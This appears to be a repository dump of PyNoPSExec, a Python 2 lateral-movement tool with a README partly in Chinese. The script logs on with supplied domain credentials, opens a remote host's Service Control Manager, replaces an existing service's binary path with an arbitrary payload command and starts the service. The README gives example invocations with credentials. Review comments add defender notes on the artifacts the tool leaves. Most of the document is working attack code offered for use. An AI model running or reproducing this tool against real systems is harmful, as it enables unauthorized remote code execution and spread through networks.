├── PyNoPSExec.py
├── README.md
└── services.exe

/PyNoPSExec.py:
--------------------------------------------------------------------------------
# -*- coding:utf-8 -*-
# Author: bobac
# Reference: SharpNoPSExec Twitter: @juliourena
# Version: v1.0
# Lateral Movement Tools
#
# What the script below does, step by step: logs on with the supplied
# domain credentials, impersonates that token, opens the Service Control
# Manager (SCM) on the target host, rewrites the binary path and start
# type of an existing service, and starts that service.  Python 2 syntax
# (print statements); the README lists Python2 / Windows 10.
#
# Defender notes (review):
# - The configuration change is persistent: the README states the script
#   has no restore function, so the rewritten binary path and start type
#   stay on the target as an artifact until restored by hand.  Comparing a
#   service's current binary path against a known-good baseline exposes it.
# - A service start-type change is the kind of event the Service Control
#   Manager typically records in the System log (event 7040).
#   NOTE(review): actual log coverage depends on the target's audit
#   configuration -- confirm in a lab before relying on it.
# - The SCM is opened with SC_MANAGER_ALL_ACCESS, i.e. administrative
#   rights on the target are required (the script reports error 5 as
#   "We Need Administrator Privilege").
# - Credentials and the payload are passed as plain command-line
#   arguments, so they are visible wherever process command lines are
#   logged (process-creation auditing on the operator host).

# Include Lib Files Or Packages
import ctypes
from ctypes import wintypes
from optparse import OptionParser

# Win32 entry points resolved from advapi32 / kernel32 through ctypes.
# Note the mix of variants: StartServiceA (ANSI) is used while every
# other call is the W (wide) version.
LogonUser = ctypes.windll.advapi32.LogonUserW
ImpersonateLoggedOnUser = ctypes.windll.advapi32.ImpersonateLoggedOnUser  # runs the calling thread under Token
OpenSCManager = ctypes.windll.advapi32.OpenSCManagerW
OpenService = ctypes.windll.advapi32.OpenServiceW
ChangeServiceConfig = ctypes.windll.advapi32.ChangeServiceConfigW
StartService = ctypes.windll.advapi32.StartServiceA
# NOTE(review): reading GetLastError through windll from Python may not
# reflect the call immediately preceding it; ctypes documents
# use_last_error=True / ctypes.get_last_error() for reliable error codes.
GetLastError = ctypes.windll.kernel32.GetLastError

# Defined Some Global Variables
Token = ctypes.wintypes.HANDLE()  # receives the logon token from LogonUserW

if __name__ == '__main__':
    # Command-line options; every one of them is required (checked below).
    parser = OptionParser()
    parser.add_option("-t", "--target", dest="target", help="Please Input Target Machinename Or Ip Address!")
    parser.add_option("-d", "--domain", dest="domain", help="Please Input Domain!")
    parser.add_option("-u", "--username", dest="username", help="Please Input Username!")
    parser.add_option("-p", "--password", dest="password", help="Please Input Password!")
    parser.add_option("-s", "--service", dest="service", help="Please Input Service Name!")
    parser.add_option("-e", "--exploit", dest="exploit", help="Please Input Exploit Payload!")
    (options, args) = parser.parse_args()

    # Argument validation: None, the empty string and a single space are
    # all treated as "not provided".  Every failure path exits with 0.
    if options.target in [None, "", " "]:
        print "[-] Please Input Target Machinename Or Ip Address!"
        exit(0)

    if options.service in [None, "", " "] or options.exploit in [None, "", " "]:
        print "[-] Please Check Service Name And Exploit Payload!"
        exit(0)

    if options.domain in [None, "", " "] or options.username in [None, "", " "] or options.password in [None, "", " "]:
        print "[-] Please Check Username And Password And Domain Information!"
        exit(0)

    print "[+] Target: %s" % str(options.target)

    # Step 1: obtain a logon token for the supplied credentials.
    # logon_type 2 is LOGON32_LOGON_INTERACTIVE, provider 0 is
    # LOGON32_PROVIDER_DEFAULT; the token is written into the global Token.
    domain = ctypes.wintypes.LPCWSTR(options.domain)
    username = ctypes.wintypes.LPCWSTR(options.username)
    password = ctypes.wintypes.LPCWSTR(options.password)
    logon_type = ctypes.wintypes.DWORD(2)
    provider = ctypes.wintypes.DWORD(0)
    result = LogonUser(username, domain, password, logon_type, provider, ctypes.byref(Token))
    if result == 0:
        error = GetLastError()
        print "[-] Logon Failed! We Get Windows System Error: %s" % str(error)
        exit(0)
    else:
        print "[+] Logon Succeed!"

    # Step 2: impersonate the token so the SCM calls that follow are made
    # as that user.
    result = ImpersonateLoggedOnUser(Token)
    if result == 0:
        error = GetLastError()
        print "[-] ImpersonateLoggedOnUser Failed! We Get Windows System Error: %s" % str(error)
        exit(0)
    else:
        print "[+] ImpersonateLoggedOnUser Succeed!"

    # Step 3: connect to the target's Service Control Manager.
    # 0xF003F is SC_MANAGER_ALL_ACCESS; error 5 is ERROR_ACCESS_DENIED.
    target = ctypes.wintypes.LPCWSTR(options.target)
    desired_access = ctypes.wintypes.DWORD(0xF003F)
    result = OpenSCManager(target, None, desired_access)
    if result == 0:
        error = GetLastError()
        if error == 5:
            print "[-] We Need Administrator Privilege!"
            exit(0)
        else:
            print "[-] We Get Windows System Error: %s"%str(error)
            exit(0)
    else:
        print "[+] OpenSCManager Succeed!"

    # Step 4: open the named service with SERVICE_ALL_ACCESS (0xF01FF).
    # The handle returned here is passed on as-is (no success check).
    scm_handle = ctypes.wintypes.SC_HANDLE(result)
    name = ctypes.wintypes.LPCWSTR(options.service)
    desired_access = ctypes.wintypes.DWORD(0xF01FF)
    service = OpenService(scm_handle, name, desired_access)

    print "[+] We Got Exploit Payload: %s"%str(options.exploit)

    # Step 5: rewrite the service configuration.  0xFFFFFFFF is
    # SERVICE_NO_CHANGE for the service type, start type 3 is
    # SERVICE_DEMAND_START, and the payload string becomes the service's
    # binary path (lpBinaryPathName, the 5th argument).  This is the
    # persistent change a defender can see in the service configuration.
    service_type = ctypes.wintypes.UINT(0xFFFFFFFF)
    start_type = ctypes.wintypes.UINT(0x00000003)
    payload = ctypes.wintypes.LPCWSTR(options.exploit)
    result = ChangeServiceConfig(service, service_type, start_type, 0, payload, None, 0, None, None, None, None)
    if result == 0:
        error = GetLastError()
        print "[-] ChangeServiceConfig Failed! We Get Windows System Error: %s" % str(error)
        exit(0)
    else:
        print "[+] ChangeServiceConfig Succeed!"

    # Step 6: start the service.  The return value of StartService is not
    # examined; only the last-error code is, and 1053
    # (ERROR_SERVICE_REQUEST_TIMEOUT) is treated as success -- presumably
    # because the new binary is not a real service and never reports back
    # to the SCM.
    result = StartService(service, 0, None)
    error = GetLastError()
    if error == 1053:
        print "[+] Lateral Movement Is Succeed!"
    else:
        print "[-] We Got Windows System Error: %s"%str(error)


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# PyNoPSExec
**A Lateral Movement Tool Learned From SharpNoPSExec -- Twitter: @juliourena 根据@juliourena大神的SharpNOPsExec项目改写的横向移动工具**
+ Platform(平台): Windows 10
+ Language(语言): Python2
## 原理简介
**通过修改服务启动的二进制文件路径,然后启动服务来执行,对服务的要求是:**
+ 没有运行的手动启动或禁止启动的服务
+ 服务没有依赖项
+ 该脚本没有提供服务二进制文件路径恢复功能,需要先记好对应路径,然后可以再次运行该脚本进行恢复,避免服务出问题
+ 关于查询服务可以使用impacket examples中的services.py 或者对应的exe程序
```bash
.\services.exe sec/testuser:TestPassword@123@192.168.23.107 config -name AppMgmt
```
![image](https://user-images.githubusercontent.com/11972644/117533063-371b2c80-b01d-11eb-918b-b36c820e6d7c.png)

## 使用方法


```bash
net use \\192.168.23.107\admin$ "TestPassword@123" /user:testuser
python PyNoPSexec.py -t 192.168.23.107 -u
testuser -p "TestPassword@123" -d test.sec.com -s AppMgmt -e "c:\\windows\\system32\\cmd.exe /c echo hackedbybobac > c:\\bobac.txt" 22 | ``` 23 | ![image](https://user-images.githubusercontent.com/11972644/117527553-82264700-afff-11eb-9850-45ecbd997f98.png) 24 | ![image](https://user-images.githubusercontent.com/11972644/117527633-0bd61480-b000-11eb-955e-d8310d463090.png) 25 | 26 | 27 | -------------------------------------------------------------------------------- /services.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/b0bac/PyNoPSExec/742566009ef1e50efc027c647dfb6d9d3ad968fe/services.exe --------------------------------------------------------------------------------